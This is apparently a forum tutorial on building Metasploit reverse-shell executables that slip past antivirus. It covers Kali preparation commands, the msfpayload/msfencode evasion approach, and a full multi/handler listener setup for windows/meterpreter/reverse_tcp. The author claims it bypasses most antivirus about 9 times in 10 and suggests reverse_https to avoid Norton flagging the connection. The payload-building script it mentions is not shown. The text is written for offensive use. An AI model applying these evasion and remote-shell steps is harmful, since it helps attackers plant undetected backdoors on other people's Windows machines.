A basic understanding of how to set up Metasploit's multi/handler
Note: If you do not have the Windows version of MinGW installed, this post can show you how I do it.
Overview
It's no secret that AV sandboxes our executables, verifies their signatures, and uses other methods to determine whether our "legit" file is malicious or not. (Norton goes a step further and makes sure it doesn't connect to an unknown source without permission.) So how do we get around this?
In this how-to, I'm going to show you my method for AV evasion that uses the msfpayload and msfencode commands to create an executable file. Then we will run the code through some custom commands and "filler" variables to make it less detectable to AV.
Be aware: Metasploit is doing away with msfpayload and msfencode in the coming months, so msfvenom is going to be used instead. If you can modify this process to incorporate msfvenom, please get with me about it. I would love to keep this updated.
Preparation
There are three things you need to do before you run the commands following.
Update Kali:
sudo apt-get update
Create a "ShellCode" folder in the metasploit root folder:
mkdir /usr/share/metasploit-framework/ShellCode
Create an "out" folder in the root folder:
mkdir /root/out
I made the executable in the /root/out folder to keep things neat when creating multiple files. This is optional, but will require some editing of the commands if you choose not to place the finished .exe files there.
The Commands
Below is the code for creating the executable. This was originally just something for me to play with, so it may look a bit messy. Change the IP, port, enumber (encoder iterations), and seed variables as much or as little as you need to fit your scenario.
Be sure that the ShellCode folder is empty prior to running this.
Starting the Listener
Just in case you're reading this and have never started a Metasploit multi/handler module, here's how you do it:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp   # match the payload you built into the executable
set LHOST xx.xxx.xxx.xx
set LPORT 4444
# OPTIONAL: keep the handler listening after the first session connects
set ExitOnSession false
exploit -j
Be sure your LHOST is the local IP address, even if you are making the executable connect to an external IP.
Final Thoughts
As stated before, this is a rework of an external article. I have made it into something more usable to me and also added the hidden command window strings that Astr0baby left out on his blog.
I have found this to be effective on multiple Windows OSes against most antivirus software; it bypasses detection about 9 times out of 10. Be aware that Norton Antivirus will recognize the file ONLY after it's executed and will block a "meterpreter/reverse_tcp" attack. One way I've (kind of) gotten around this is to use meterpreter/reverse_https in both the executable and the listener. It still asks the user whether they want to allow the connection, but it doesn't flag it as malicious.
So, give it a shot. If you like it, I'm glad I could help. If you have ways to improve it, PM me. I would love to improve on this!
UPDATE: Now in Proper BASH Format.
OK, so with some of you having problems getting this to work, I decided to make this a script rather than something to copy and paste.